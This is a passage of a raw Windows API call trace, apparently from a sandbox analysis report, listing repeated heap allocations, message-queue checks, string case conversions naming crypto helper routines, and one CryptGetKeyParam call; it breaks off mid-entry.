RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.989] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.989] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0030.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.989] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2c8 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce08 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.990] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.990] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.991] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.992] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.992] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0030.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.993] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.996] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da308, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da308*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.996] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.996] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.996] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0030.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.996] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.996] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 